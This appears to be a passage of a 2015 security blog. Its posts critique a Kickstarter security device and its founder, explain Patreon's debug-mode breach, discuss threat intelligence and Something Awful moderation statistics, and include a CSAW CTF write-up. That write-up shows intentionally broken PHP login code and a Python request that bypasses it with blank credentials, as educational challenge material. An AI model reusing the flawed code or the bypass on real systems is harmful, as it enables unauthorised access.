Also, while I won't explain the problem with PGP in this response, I will explain the problem with your example. PGP is not something that you'd use to secure a network or computer; it's something you use to secure data. PGP won't stop malware, won't stop data leaks on networks, and won't prevent the human problem. This is really an inadequate example on your part, and I am not sure why you'd use it other than that you have no clue--which is what I think is going on here.
And that is what I have focused on for the past 12 years; taking something very complex and making it easy to use. For example in 2001 at KPN (biggest Dutch carrier) I created a simple way to connect via ‘GPRS’ – because they understood that without usability nobody would use their service. I introduced automatic carrier detection and Wi-Fi (including automatic authentication to various hotspot providers) into the Vodafone Connection Manager worldwide in 2005 and 2006, although it seemed like it couldn’t be done because Wi-Fi was a ‘competing technology’ to their mobile data offering. In 2009 I created a solution for Best-Buy that would do both GSM and CDMA (2 competing technologies used by AT&T and Verizon) and switch a user from one network to the other, based on the best coverage for that user at that location - without the consumer having to do anything. 
Veil Systems is not based around a small group. It’s about a collection of idealistic people from the US, UK, Ukraine, Argentina, The Netherlands, Switzerland, Germany and Russia that came together – all bringing their own expertise – to create Veiltower. Our goal: help stop cyber-crime and protect the people that need protecting. 
Great. I am glad that you have this team and experience behind you: so why does the Kickstarter only highlight yourself, a designer, and a logistics person instead of, say, the people who are actually behind the development of this project? You claim to have people scattered all over the Americas and Europe yet only focus on yourself and two people from the Detroit area. When you cite these countries, are they the actors in your videos or are they actually the main people behind the project?
We received comments about the lack of technical specs on our Kickstarter page. We did this deliberately. In our experience most of you don’t care about the various technical ‘flavours’ which could have been used. EAP-TLS vs. EAP-TTLS vs. EAP-FAST or 256-bit symmetric key vs. 2048-bit asymmetric key or Broadcom vs. Intel chipsets or why 256Mb is enough instead of 512Mb or Debian vs. OpenBSD vs. openSUSE. Every one of them have pro’s and con’s. That creates an infinite debate without end. In the end; it’s a ‘flavour’. You – the people we have built Veiltower for - just want it to work. You just want it to protect you. We knew, well in advance, that with adding a lot of tech specs we would scare you off or run the risk of our story would end up in a technical debate. And that is not what this should be about. 
You're essentially telling everyone that you'd rather create a black box than give any level of specification for the product? This makes no sense considering that even other Kickstarters like your own have referenced such things. Also, dismissing choices like symmetric versus asymmetric encryption as "flavours" is woefully ignorant and just demonstrates your lack of technical depth.
Is Veiltower is finished product that has undergone every possible certification and validation process? No! It’s a prototype that we have developed, tested and that works. Can it be improved? Always! And that’s exactly why we are on Kickstarter. The funding will allow us, as part of our 6 month process, to do the types of improvements, certification and validation tests that the information security community – rightfully – demands from a finished product.  
Whoa. Stop the fuck right there.

So what you're telling us is that Veiltower has not undergone every possible certification and validation process, but you had the audacity to claim that it is "100% secure"? What sort of validation tests do you plan to run on this? What sort of certification? Can you elaborate on how you tested the device?
Note: If we don’t achieve our funding goal. Nobody pays anything. And if we achieve our funding goal and we don’t deliver we also refund your money. We have stated this on our Kickstarter page very clearly. 
This opens up a question for me: how are you going to guarantee continued support for the product after raising all the money? The reason I ask is that in 2013 your prior company, Diginext, declared bankruptcy, leaving the organization owing almost half a million Euro.

If your product is as good as you claim it to be, you would not be going to Kickstarter to get it launched, because you'd have investors crawling all over you for what would be considered the Holy Grail of cyber security. Your plan to use Kickstarter, taken together with your earlier bankruptcy, does not add up in my books as something that will work long-term for users.
Let’s do this!
Edsard Ravelli
Let's say we don't do this and instead end the Kickstarter. You're making yourself look like a fool and you're tarnishing the names of two other individuals who do not deserve to be part of your failure.

Tuesday, 6 October 2015

Veiltower: a misleading plastic jungle of deception

Once again we have another Kickstarter that claims that it is 100% secure, un-breachable, and uses unheard of cryptography. Introducing "VeilTower", a plastic jungle of deception.

As indicated in my opening, I've dealt with this sort of claim before where erroneous claims about the product's capabilities were made in a Kickstarter. In this case, we're being told of the following capabilities in the device using terms like "military-grade" which tend to set off alarms:
Some of the most security conscious organizations in the world have been using what’s called 802.1x with great success. That’s what we’re using. The encryption currently in use for typical consumers is 256 bit encryption. We’re utilizing 2048 bit encryption. We wanted to give consumers a product with military-grade technology.
Veiltower also makes your digital presence anonymous by masking your traffic and connected devices with it's state of the art embedded VPN (Virtual Private Network) solution.
It goes on further in an update that was posted after they were confronted online to explain its "100% secure" statement:
Some have questioned whether its not too bold of a statement to claim Veiltower provides 100% security. And that is a very fair question.
The simple reality is that almost anything can be cracked/hacked if enough effort is put in and over the years various standards (remember the heartbleed bug?) contained, in hindsight, vulnerabilities.
So to our knowledge, the encryption we use in Veiltower is secure! That's until one day we, and many other Access Point providers that employ the same encryption, are proven wrong.
For the techs:
VPN: Strong Swan IKEv2
This of course after this tweet was made at me:

Needless to say it started quite the Twitter conversation so I am going to condense everything I know about them and additionally opine on the matter.

To start off here: no product, no matter its claims, can state that what it does or provides is 100% secure and immune to breaches. Anyone who makes such a claim is either being intentionally deceptive or has zero clue about what they're talking about. In this case, I think it's more the latter, based on the background of the individual leading this project, as he does not appear to have ever worked on anything cyber security-related.

Veiltower (also known as Veil Systems) has a bit of a history, and this is not their first Kickstarter either. The earlier campaign draft, penned around November 2014, has since been removed, but I did manage to create a PNG mirror of it. They tweeted aggressively leading up to the date they expected to launch everything, but for some unspecified reason Kickstarter did not accept the submission, so they promised to regroup and launch again later in the year.

However, after the last tweet, they made no further mention of the Kickstarter campaign and just proceeded to share videos that they had already made. Additionally, the product was slightly different from what we are seeing now, as they were also promising NAS functionality and an IP camera in addition to the "security" features we're seeing today.

Physically the products are similar, except that there is a glowing device shaped like a bowling pin that would have had the IP camera at the top. The old campaign, however, appears to provide more details on the inner guts of the device, which is something I found lacking in the current one.

They also provided the specifications in this old campaign--which, again, are sorely missing from the current one.

However, something didn't add up: how is the PCB larger than the above disc in the guts image? If we look at a photo of the rear of the unit, you'll notice that the device doesn't even have ports that match the board.
This sort of reminds me of the Sever thing because it was revealed to me in conversation with some people close to the project that the board didn't match the case itself. What's going on here? Well without details on the specs of the unit in the current campaign, I guess we'll never know.

One thing to add: I call this a "misleading plastic jungle of deception" for good reason: they make the following claim about the antenna design:

A friend of mine is an avid ham radio operator and he informed me that the antenna slant wouldn't be enough to incur a polarization shift, meaning that the benefit from this design would be non-existent.

In any event, based on the hardware details from the previous Kickstarter and the lack of details in the current, it doesn't really bode well for this device at least from a physical standpoint. Any claims about its abilities to improve your overall Internet experience will be exaggerated at best.

Perhaps it's worth learning a bit about who's behind it: really there is only one person, but it seems like there is quite a bit of discord going on behind the scenes, as evidenced in these tweets.

I am guessing that after the exchange started earlier (the crypto remark from earlier was by this "social media guru"), Edsard Ravelli, the founder or leader behind this project, decided to get involved and effectively sack the person behind the Twitter account--it should be assumed that the 802.1x encryption remark was made by the removed individual. It seems fair, then, to talk about the person behind this project.

Edsard hails from Amsterdam and appears to have been involved with the project from the start. He has claimed via his LinkedIn to once have been CEO and Founder of a company called DigiNext, but left in Autumn 2014, a year and a half after founding Veil Systems--I was not able to procure details on what happened with DigiNext but I can safely tell you that their website has a lot of broken links. Additionally he also has a software patent to his name, depicting some sort of update mechanism that reeks of similarity to every other software updater out there.

Veiltower mentions two other employees in the Kickstarter: Eric Stebel and Kris Caryl. Eric is cited as being the "Lead Designer" for the project, but judging by his website, he's likely involved in the creation of the physical case of the device and not the electronics itself--I will admit that Eric has done some cool stuff. I was not able to find much in the way of information on Kris other than her being cited as Veiltower's logistics person.

Noticed something peculiar? Not a single person with an information security, software development, or hardware design background is cited. And here they are making claims about having a product that is 100% secure.

Of course, Edsard felt it was fine to make this claim because he's trying to lay it out for the layman:

Edsard's excuse here is that it's acceptable to lie in the Kickstarter because he's trying to "appeal to consumers who [are] technology illiterate". By that logic, Volkswagen should be off the hook because consumers wouldn't notice the difference between the government-mandated emissions testing and "real world situations".

He continues by saying that he had details posted on Facebook weeks before, to over 5,000 followers, and nobody questioned the claims. This is a completely idiotic argument and I am not even going to entertain the idea of writing here about why.

Going back to employees, Veiltower has gone out of their way to hire freelancers using Elance. Since April 2014, they have spent $38,002 USD across 29 different freelancing job requests--or about $1,300 on average per request. In contrast to their $250,000 goal on Kickstarter, the money spent on Elance would account for 15% of what they need to raise. How much is Edsard paying himself, Eric, and Kris? At a minimum, if these two have worked a year for Veil Systems at a wage of $8.12/hour, they'd each account for $16,952 ignoring things like sick days or other labour aspects. Times two, that's 14% of the campaign costs, meaning that around 30% is just for labour--this is a huge assumption too.

It should also be noted that none of the freelance requests were for anything technical and appeared to be solely marketing-related.

There's also no indication that there are other employees with Veil Systems as the name does not link to any other employees on LinkedIn other than Edsard himself.

One of the rewards is a white Veiltower for 1,999 people at a cost of $159. To meet their goal of $250,000, they need to sell over three-quarters of those 1,999 units in order to cross the threshold required for a Kickstarter payout. It makes me wonder: does $250,000 even cover all the salaries and development costs incurred?
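That three-quarters figure is easy to verify (my own arithmetic, based on the numbers above):

```python
import math

goal = 250_000        # Kickstarter funding goal in USD
price = 159           # cost of one white Veiltower reward
units_offered = 1_999 # reward slots available

units_needed = math.ceil(goal / price)   # units that must sell to hit the goal
fraction = units_needed / units_offered  # share of the reward tier required
```

Selling 1,573 of the 1,999 units--just under 79% of the tier--is what it takes to reach $250,000 on that reward alone.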

If this was a product that was worth funding, a Kickstarter campaign would have not been ever needed. I tend to believe that the vast majority of campaigns out there are for ideas that are not marketable at all and just pander to a niche market. There are exceptions to this rule but it's a very short list of them.

Edsard has claimed that tomorrow he'll have some answers so we shall wait and see!

Friday, 2 October 2015

How Patreon made themselves a hole

As you might have heard, Patreon was breached and had its database and code dumped on the Internet. Canary has a copy of all e-mails and they are now all searchable.

I wrote this elsewhere, but this is how Patreon created a problem for themselves.

It's pretty easy to enable debug within Werkzeug, but it isn't enabled by default. Nor does it listen on "" by default; it instead binds to "".

Here's exactly what they did in the code (this is straight from the dump):
    web_app.debug = patreon.config.debug
    web_app.run('', port=args.port, use_reloader=False)
Then, in patreon.config.debug, the value was set to true:
debug = True
Whoever ran this server wouldn't have needed to feed it arguments to enable debug, as it was hard-coded into the application. All someone had to do was type "python patreonweb.py" and the server would be ready to go with debug mode enabled.

Detectify Labs wrote a blog entry and linked to a previous one of mine. Don't enable debug on Internet-facing servers and if you can help it don't enable it to listen on "" either.
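To illustrate the safer pattern (purely my own sketch, not Patreon's code; `APP_DEBUG` is a hypothetical variable name), the debug flag should be derived from the deployment environment rather than hard-coded:

```python
import os

def debug_enabled(env=None):
    # Debug stays off unless the environment explicitly opts in, so a
    # production host that simply never sets the variable stays safe.
    env = os.environ if env is None else env
    return env.get("APP_DEBUG", "").lower() in ("1", "true")

# e.g. web_app.run('127.0.0.1', port=args.port, debug=debug_enabled())
```

With this arrangement there is nothing for a developer to forget to remove before deploying.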

Thursday, 1 October 2015

Threat Intelligence (is|can be) (useless|useful)

One of the interesting side-effects of SIEMs becoming popular in organizations is the rise of threat intelligence. Threat intelligence is really nothing new as it has existed since the mid-90s in the form of DNS Blackhole Lists (DNSBL) to combat spam. Today, we're seeing it used to not only identify spam but to also identify infected hosts belonging to botnets, machines identified belonging to less-than-reputable ISPs, and much more.

However, I've struggled with the usefulness (or uselessness) of this data. At the organization I work at, we're using some free threat intelligence data that is, as described, really useful, but in practice it is very difficult to utilise: in order to sift out the useful tidbits, we have to filter out the noise.

A prime example of a useful list that is littered with noise is a list of Tor exit and entry nodes. This is very useful data, as one can detect the use of these nodes quite quickly and then perhaps determine if there is an infected machine or inappropriate use. However, the data becomes useless when these Tor nodes (smartly) add themselves to NTP pools and machines with misconfigured software use an NTP pool instead of whatever is set within domain policy. The solution is of course to fix your domain policy, but other pitfalls may arise as these nodes may just adopt something else to obscure their purpose.
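The filtering problem can be sketched like this (a hypothetical illustration; the function and field names are mine, and no specific feed is implied): suppress Tor-list hits that are better explained by NTP pool membership.

```python
def flag_tor_hits(connections, tor_exits, ntp_pool_hosts):
    # connections: iterable of (src_ip, dst_ip, dst_port) tuples
    # tor_exits / ntp_pool_hosts: sets of IP address strings
    hits = []
    for src, dst, dport in connections:
        if dst in tor_exits:
            if dport == 123 and dst in ntp_pool_hosts:
                continue  # likely NTP pool noise, not actual Tor use
            hits.append((src, dst))
    return hits
```

The point is that the raw feed alone produces alerts; it only becomes intelligence once you cross-reference it against the benign explanations.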

Another example of where I find threat lists useless is that some groups will just place numerous honeypots and sensors across the globe and then use them to collect information on which machines are misbehaving and where they are attacking. A good example of such a setup would be IP Viking's Norse map, which looks like something ripped out of a remake of WarGames.

The problem I have with this approach is that it's like making yourself a member of as many Block Watch groups as possible. Sure, you're going to know which neighbourhood is more at risk than another, and you might even know who the perpetrators are, but is that knowledge useful to you in Seattle, belonging to none of those Block Watches, when the incident happened in Mumbai? Yeah, you'll mark that IP or IP block as malicious, but is it really a true concern?

Companies will sell this sort of information at ridiculous rates too. One company I had the pleasure of being on the phone with wanted to offer such data at a rate of $150,000 USD per year. That's a six-figure value for a constantly updating list of IP addresses. The data isn't really verifiable either as they depend on their own sources and purportedly say that whatever they're seeing is a "threat".

And that is just it: what constitutes a threat to your network and will threat intelligence provide you with anything of value? Is it really worth spending $150,000 USD per year on threat intelligence that may or may not be of value?

I'm going to toot my own horn here and say that the type of threat intelligence that these lists provide is more or less useless outside of perhaps the Tor example and perhaps mail reputation--I can save the latter for another rant.

With Canary (name soon to be retired), I don't mark discoveries found within the database as a threat--in fact, I avoid the phrase "threat intelligence" entirely on the site but that is likely to change. It's better to identify a threat on your own rather than rely on some third-party to do so. If your IP block, company hostname, or perhaps a hash with your own special salt shows up in the service, it's up to you to determine if it is worth investigating. At that point, the threat intelligence could actually be potentially useful.

Your security team should be making a decision on what is a threat and then reacting appropriately based on your response plan. Relying on a third-party to determine a threat is going to slow you down and eat up resources that otherwise may be better suited for other things.

When you look at the aforementioned Rolls-Royce-priced service, you're going to get a list of IP addresses that you should look out for. It may be useful because maybe you'll just block those addresses from touching your network, or maybe you'll sniff around your firewall logs to see if an address popped up before, but at the end of the day you're dealing with potential red herrings, all because you're reacting to a situation in Mumbai when you're all the way in Seattle.

I don't really hate threat intelligence services like my example per se, but at the same time I struggle to find the value in them. It is useful to know what sort of malicious activity is going on across the Internet, but it can be useless to make decisions within your enterprise based on it.

Tuesday, 22 September 2015

CSAW CTF 2015 - Web 200 in two steps (using PHP's awfulness)

Some friends and I participated in this year's CSAW CTF under the name "Northwest Beer Drinkers". We placed 89th out of a total of 1,100+ teams, so I guess we can boast about being in the top-100 this year (woo). Sadly I couldn't participate myself too much this year as I had a family gathering to attend to, but I did spend some time early on and managed to solve Web 200.

Web 200, or "Lawn Care Simulator", was a simple web application that plays on the joke about "growth hackers". It was written to look like it was PHP-based, complete with a login page, registration form, and a suggestion that you join "their company". It definitely was quite tongue in cheek and they even went out of their way to make the grass grow in the blue square if you pressed the "grow" button.

When you attempt to login, it hashes the password field before sending off the form. This is done via an embedded JavaScript that makes use of the MD5 function in the CryptoJS library. The code executes as follows:

function init(){
    document.getElementById('login_form').onsubmit = function() {
        var pass_field = document.getElementById('password');
        pass_field.value = CryptoJS.MD5(pass_field.value).toString(CryptoJS.enc.Hex);
    };
}
The registration page also refuses to let you sign up for an account, citing that it is currently in "private beta". It tries to play a trick on you: the form looks for a hash value from the initial page, supplied by an improperly placed Git repository (which is important to note for later in this writeup). I couldn't find a way to make use of this hash in the form, so I decided to attack the login mechanism instead, since it was doing some weird hashing before sending the form off.

And this is where we sort of quickly solve the problem.

I decided to see what would happen if I just logged in with no credentials at all using Python Requests. The intention here was to see what sort of error would be produced and then use that to solve the problem. However, it sort of went sideways...
>>> import requests
>>> data = { 'username': '', 'password': '' }
>>> r = requests.post('', data=data)
>>> r.text
u'<html>\n<head>\n    <title>Lawn Care Simulator 2015</title>\n    <script src="//code.jquery.com/jquery-1.11.3.min.js"></script>\n    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script> \n    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css" rel="stylesheet"></link>\n</head>\n<body>\n<h1>

As we can see, this worked. At the time when the flag was revealed, I was not 100% certain that this was an intentional way to get the flag but while reviewing my notes and other information, I became conflicted.

If we go back to my remark about the Git repository, it was the repo for the entire source code to this challenge. And as it turns out in another write-up, it was key in solving the challenge for that person.

I did grab the source code from the challenge and took a look at why I was successful with fewer steps.
    require_once 'validate_pass.php';
    require_once 'flag.php';
    if (isset($_POST['password']) && isset($_POST['username'])) {
        $auth = validate($_POST['username'], $_POST['password']);
        if ($auth) {
            echo "<h1>" . $flag . "</h1>";
        } else {
            echo "<h1>Not Authorized</h1>";
        }
    } else {
        echo "<h1>You must supply a username and password</h1>";
    }
So now we know it uses the validate function from validate_pass.php, so let's examine that to see why this worked.

function validate($user, $pass) {
    require_once 'db.php';
    $link = mysql_connect($DB_HOST, $SQL_USER, $SQL_PASSWORD) or die('Could not connect: ' . mysql_error());
    mysql_select_db('users') or die("Mysql error");
    $user = mysql_real_escape_string($user);
    $query = "SELECT hash FROM users WHERE username='$user';";
    $result = mysql_query($query) or die('Query failed: ' . mysql_error());
    $line = mysql_fetch_row($result, MYSQL_ASSOC);
    $hash = $line['hash'];

    if (strlen($pass) != strlen($hash))
        return False;

    $index = 0;
    while ($index < strlen($pass)) {
        if ($pass[$index] != $hash[$index])
            return false;
        $index += 1;
        # Protect against brute force attacks
    }
    return true;
}
While my PHP is not up to snuff, as far as I understand this should have come up with no results unless the database itself had a row that was completely blank in both the hash and username fields. If the result variable could not be created then the script should have died outright, but it was seemingly able to fetch a row and feed it into the line variable.

In any event, the solution was not to ram it with a bunch of requests but to just post a blank username and blank password. Whether or not this is the official solution I am not 100% sure.

Edit: PHP is an awful language

I had a chat with a friend of mine (pr0zac) who knows PHP better than I do, and he pointed out that mysql_fetch_row returns false if no rows are found. What likely happened here is that SQL failed to return any rows, but the query itself technically succeeded, so mysql_query returned without dying.

mysql_fetch_row then returned false, which means $line['hash'] evaluated to null, and strlen(null) comes out as 0.

Since strlen of the empty password is also 0, the length check passes, the character comparison never executes, and the function falls through to return true.
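The failure mode can be modelled in Python (a rough analogue I wrote for illustration; PHP's type juggling does the equivalent implicitly):

```python
def validate_model(password, stored_hash):
    # A missing database row makes the stored "hash" behave like an
    # empty string, mirroring PHP's strlen(null) == 0 behaviour.
    stored = "" if stored_hash is None else stored_hash
    if len(password) != len(stored):
        return False
    for p, h in zip(password, stored):
        if p != h:
            return False
    return True
```

An empty password against a missing row sails straight through the length check, the comparison loop never runs, and authentication "succeeds".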

PHP is fucking awful.

Thursday, 10 September 2015

A look at Something Awful's moderation by the numbers

Something Awful has been on the Internet for over a decade and a half. In that time, it has been responsible for many aspects of Internet culture. I myself have been on the website's forums since December of 2000, so I've seen a lot of stuff come and go.

One aspect of the forums that is unique when you compare it to other Internet communities is that it keeps a public ledger of all of the punitive actions made by moderators and administrators to the site's users. This was implemented in 2004 and it has been kept since.

During an attempt to get over some jet lag, I decided to see what sort of numbers could be retrieved from the "Leper's Colony" which is the aforementioned ledger. After some attempts, I managed to download the data and then compile it into JSON which will be provided after I finish digging through the information.

I've also crunched some numbers and made pretty graphs to see how the site has behaved since the ledger was started. I'll start with the numbers in this entry and then provide some pretty stuff in the next.

No data outside of the Leper's Colony was retrieved other than a count for total users.

There's a lot of information you can glean from this data, including how involved Richard "Lowtax" Kyanka has been throughout the years and even how much money accounts can cost.

Base Statistics

The ban data covers all moderator and administrator data from August 7th, 2004 through to September 9th, 2015. During this time there were 136,845 events, meaning that on average there were 33 to 34 events per day.

When the data was compiled, there were approximately 193,000 accounts--this value fluctuates, so we're going to leave it at that. Additionally, there are three punishment types marked in this ledger: bans, permabans, and probations.
This table breaks it down by the numbers:


Based on the unique values, this means that around 18% of all users have had their accounts probated for a period of time, 9% have been banned, and about 1% have been permabanned entirely. The numbers also tell us that less than 4% of permanent banishments are not really all that permanent.

Probations

One aspect of the Something Awful forums is that temporary (and not-so-temporary) banishments are given out quite frequently. Users who receive these probations can view the forums and send private messages, but they cannot post new threads or replies.

Probations can be given in one of two ways: either a moderator directly probates someone for whatever reason, or the user posts a thread that gets removed ("gassed"), which results in a 15-minute inability to post. The latter, however, does not end up on the ledger.

The first reported probation in the dataset was on September 27, 2004, and the infraction was "grasshopper leeching in BYZT".

The following table shows the length of a probation and the number of times each was given.

Length         Count
<6 hours       3
6 hours        22,095
12+ hours      6,280
1 day          34,895
3 days         24,050
1 week         13,607
2 weeks        1
1 month        3,227
>1 month       2
100,000 hours  192

For the last one, 100,000 hours is about 11.5 years. It's given out periodically to those who invoke the ire of an administrator who decides that it's much more humorous to just remove them for a decade. The first person to suffer this got the punishment on May 8th, 2005, which means that on October 4th, 2016, or about a year from now, that account will be able to post once again--the account has not posted since being probated.
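As a quick sanity check on that date, here is a sketch that assumes the probation was issued around midday on May 8th, 2005:

```php
<?php
// 100,000 hours works out to 4,166 days and 16 hours.
$start = new DateTime('2005-05-08 12:00');
$start->add(new DateInterval('PT100000H'));
echo $start->format('Y-m-d'), "\n";   // 2016-10-04
```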

The total number of probation hours given would add up to just slightly over 3,000 years.

Bans

Bans are as described: you are removed from the forums if you're found to be in violation of the rules or you've been probated so many times that a message needs to be sent.

Unlike many other websites such as Reddit or Digg, Something Awful requires you to pay in order to sign up. This hasn't always been the case, but accounts registered after late 2001 have typically been paid for at a rate of $9.99 USD. Numbers are hard to determine, but before paid accounts became part of the forums' operation there were about 20,000 users, meaning that from account registrations alone, around $1.7 million has been paid by new users. This could be impressive if it weren't for the fact that it spans 14 years, meaning it would just be $100,000 per year if it were to remain consistent.
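Back-of-the-envelope, using the approximate figures above (both account counts are rough, and not every account since 2001 was paid for at exactly $9.99):

```php
<?php
// Rough registration revenue: paid accounts times the $9.99 fee.
$total_accounts = 193000;  // approximate account count when the data was pulled
$free_accounts  = 20000;   // accounts predating paid registration
$fee            = 9.99;

$revenue = ($total_accounts - $free_accounts) * $fee;
echo number_format($revenue), "\n";   // 1,728,270
```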

However, unique to Something Awful is the ability to pay for the ability to return to the forums. With the exception of a permanent ban, all one has to do to return is pay the $9.99 fee and they'll have their account back--there is one catch: if you have any upgrades, which also cost $9.99 each, you'll have to pay for those once again too.

And it has worked. Accounts have been re-registered several times, as indicated by the ban data itself. Here's a table that breaks down ban counts and how many unique users fall under each count.

(table: # of bans vs. number of unique users with that many bans)

As you can see, it can get quite impressive, but it should be kept in mind that someone who gets banned won't necessarily come back. However, multiple bans do indicate that the person has paid the $9.99 at least once to return. If one were to assume that everyone banned has paid to come back, Mr. Kyanka would have raised about $240,000 from re-registrations alone.

The user who takes the top spot with 35 bans actually has more: the person in second place is the same user, which means they have been banned 66 times, or have contributed at least $660 to Something Awful.

Or maybe they're not the top-most. Another user had registered 77 times under different but similar aliases, meaning they've spent almost $770.

What this speaks to is that you're not going to get rid of all problematic users by banning them, but it does mean that you can at least get some compensation for having to put up with them.

Permabans

This account punishment is as it reads: a permanent ban. As mentioned earlier, some accounts do get the permanent ban lifted: it appears to be about 3.5%.

To break it down, 2,307 accounts have been permanently banned once. For accounts permabanned twice, it's at 73. Accounts permanently banned three and four times are both at 3.

It should be kept in mind that some accounts permabanned once may effectively have been permabanned twice or more, as they may be re-registrations under a different name.

Coming up...

In the next entry, I'll show pretty things in graphs. This one will take a bit longer than a few days but it should be fun.

Monday, 7 September 2015

Geotrust/Symantec has revoked all SSL certificates for .PW TLD domains

I just came off of vacation and had this show up in my e-mail regarding some problems with Canary:
Good morning Colin,
I hope your weekend was awesome.
Just a quick email to let you know that I am having issues with a possible certificate problem on Firefox, chrome, ie and even edge.
It works fine on safari on an iPad.
Needless to say, I initially passed it off as someone having a misconfigured client or running some outdated software (I really should avoid these biases, but I digress). Just as a sanity check, however, I decided to take a look.

Being that I didn't revoke the certificate myself, I reached out to the reseller that issued the certificate and had this relayed to me:
Reseller rep.:
We regret to inform you that certificate [number] for www.canary.pw domain has been revoked by the Certificate Authority due to the site being flagged as potentially containing malware in a recent site scanning by Symantec (owner of GeoTrust). Unfortunately we were not warned of the upcoming revocation, so we apologize for any inconvenience that this may cause.


Reseller rep.:
As per our check with Symantec, they will no longer be issuing SSL certs to .PW domains. You are advised to remove the SSL certificate from the server to avoid security errors related to a revoked certificate.
I was not happy to read this, but my reseller was awesome enough to issue me a refund so I could switch the certificate to another provider. There is, to say the least, no malware on Canary, so the statement by Symantec is flatly false.

But here's the thing: why did Geotrust just go ahead and revoke the certificates for all .PW domains without any warning? Why did they believe that this was the best course of action and why did they decide to put domains at risk? It is because of these questions that I cannot recommend using them as a certificate authority.

Geotrust has done a great job demonstrating the problem with certificate authorities: they're closed organizations that you cannot put any trust into.

Wednesday, 26 August 2015

What's in a name? Retiring the name "Canary"

Almost three years ago, I started on a project to retrieve data from various sources and process it, with the idea of letting people know when their data has been compromised, via alerts or just searching. After the Ashley Madison data hit the Internet last week, I had more searches in one day than in the entirety of the project up until then.

Canary has gotten more popular and has received more data since its start in March 2013. Last year, it hit a milestone of one million total samples. And as time has gone on, I’ve realised two things about the service that need to be changed.

The first one is obvious: Canary has been getting slower as it has received more data, and the results are becoming less clear. When I first developed the application, my knowledge of databases and efficient search queries was quite limited, even though I was eager to make use of these tools. Having learnt some things from other projects I am engaged in, I have now almost finished rewriting its backend and migrating it to a new database engine. When it is ready later in the autumn, I’ll be able to discuss this in further detail.

Now, what is the second one you might ask? It needs a name change.

Originally, Canary had a few prototype names: the working name was “DataAlert” and its codebase was referred to as “ODLDB” or “Online DataLoss DataBase”. After getting the software to work as expected, the name “Canary” was adopted after an earlier project of mine, “Avivore”, which was a tool for finding phone numbers and other personal information on Twitter. Internally, I still refer to the software as “ODLDB” even though its components are all named after specific birds.

The problem I am running into now is that there are far, far too many applications and services on the Internet using the name “Canary”. To make matters worse, there have been several other “Canaries”, including one that did practically the same thing as the service I run today and another with a logo so similar to mine that I considered speaking to a lawyer to see what my options were for preventing the sale of its service within North America.

Four services or projects have adopted the name “Canary” in the information security sector since I started Canary in 2013. One is a piece of hardware that behaves as an internal network honeypot, another is a webcam for home monitoring, one does practically the same thing as what I offer, and another is supposed to detect changes in SSL certificates. For three of these, I can remain confident that those who adopted the name did little to no research on it and just slapped it on--the camera product came out a month or so after I announced my service, so I don’t hold the same sentiment there.

It has gotten to the point where I have been getting e-mails about these other Canary-named services that have nothing to do with me. These e-mails happen at least once or twice per week and usually I just respond with, “these are not the canaries you’re looking for”.

Having said all that, I am not a fan of being litigious or aggressive towards others, especially since the space where “Canary” is used as a product name is becoming quite crowded, and the energy and capital I’d have to spend fighting for the name would exceed that of simply renaming the service and redirecting traffic to a new domain. I am also a person who prefers to build bridges, and the other Canary-named services are run by individuals and groups I’d rather be amicable with above anything else. Additionally, I don't think the adoption of this name by others was intended to undermine me; I think it's just a lack of forward-thinking.

With the release of a new version of the software will come a new name for Canary. I have several candidate names at this time, but I will be doing my research. What I ask of you as the reader is that when you name a project, you consider doing a simple search on Google or elsewhere to ensure that you won’t be stepping on toes or treading on people who’ve already invested time and energy into the name.